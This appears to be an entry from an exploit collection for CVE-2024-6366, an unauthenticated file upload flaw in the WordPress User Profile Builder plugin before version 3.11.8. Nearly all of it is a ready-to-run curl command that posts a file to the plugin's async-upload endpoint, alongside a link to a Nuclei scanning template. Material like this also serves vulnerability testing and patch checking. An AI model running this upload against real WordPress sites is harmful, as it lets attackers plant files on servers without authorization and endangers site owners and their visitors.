CVE ID : CVE-2024-6366
System : WordPress
Type : file upload
Exploit :
Nuclei template (https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-6366.yaml)
User Profile Builder plugin < 3.11.8
curl -vvvv -X POST -F 'wppb_upload=true' \
-F 'meta_name=test.jpg' \
-F '_wpnonce=e8' \
-F 'action=upload-attachment' \
-F 'async-upload=@test.jpg' \
https://example.com/wp-admin/async-upload.php